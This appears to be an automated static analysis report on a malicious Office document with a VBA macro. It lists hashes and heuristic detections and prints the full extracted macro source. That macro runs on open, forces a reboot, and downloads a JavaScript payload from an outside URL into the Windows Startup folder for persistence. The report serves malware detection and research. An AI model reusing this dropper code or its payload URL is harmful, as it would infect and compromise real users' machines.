Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 bf823e55b26dfee8…

MALICIOUS

Office (OOXML)

9.2 KB First seen: 2021-04-01
MD5: 101be948ef3eaf39cf9e0147f0bc9624 SHA-1: af937ae64876f51bc331e2d5786ac2fced92b703 SHA-256: bf823e55b26dfee8060c2fc7ea6955b63f64c9d87728c56df1c2bb6d22232a4c
190 Risk Score

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
     Shell "shutdown -r -f -t 02", vbHide
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        startupfolder = "C:\Users\" + CreateObject("WScript.Network").UserName + "\AppData\Roaming\" + "Microsoft\Windows\Start Menu\Programs\Startup\p111.js"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.diamantesviagens.com.br/PPO.js Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2133 bytes
SHA-256: 0801c9132a6ce1a352ba893a64c49c33a1471db27f14610c1c6935629248d059
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"

Option Explicit

#If VBA7 And Win64 Then

Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr) 'For 64 Bit Systems


    Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As LongPtr, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As LongPtr, _
        ByVal lpfnCB As LongPtr _
      ) As Long
    Private Declare PtrSafe Function DeleteUrlCacheEntry Lib "Wininet.dll" _
      Alias "DeleteUrlCacheEntryA" ( _
        ByVal lpszUrlName As String _
      ) As Long
#Else


Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds as Long) 'For 32 Bit Systems

    Private Declare Function URLDownloadToFile Lib "urlmon" _
      Alias "URLDownloadToFileA" ( _
        ByVal pCaller As Long, _
        ByVal szURL As String, _
        ByVal szFileName As String, _
        ByVal dwReserved As Long, _
        ByVal lpfnCB As Long _
      ) As Long
    Private Declare Function DeleteUrlCacheEntry Lib "Wininet.dll" _
      Alias "DeleteUrlCacheEntryA" ( _
        ByVal lpszUrlName As String _
      ) As Long
#End If
Public Sub Download()
    On Error GoTo Err
    Dim Auxiliar As Long
    Dim URL As String, CaminhoLocal As String, startupfolder As String
    URL = "https://www.diamantesviagens.com.br/PPO.js"
    CaminhoLocal = "C:\Users\Public\pandorinha.zip"
    startupfolder = "C:\Users\" + CreateObject("WScript.Network").UserName + "\AppData\Roaming\" + "Microsoft\Windows\Start Menu\Programs\Startup\p111.js"

    Auxiliar = URLDownloadToFile(0, URL, startupfolder, 0, 0)
   ' MsgBox "Download efetuado com sucesso!"
    Exit Sub
Err:
    MsgBox "Erro no download do arquivo"
End Sub





Public Function ForceReboot()
SleepTest
 Shell "shutdown -r -f -t 02", vbHide
End Function
 
Sub SleepTest()

'MsgBox "Execution is started"
Sleep 180000 'delay in milliseconds
'MsgBox "Execution Resumed"
End Sub


Sub auto_open()
ForceReboot
Download

End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 19456 bytes
SHA-256: f4a0bbeb9d321a83719f4e3e6c7d6ba444bc966bbbf7c33abff85cba953db5c8

Open this report in the interactive analyzer, or submit your own file for analysis.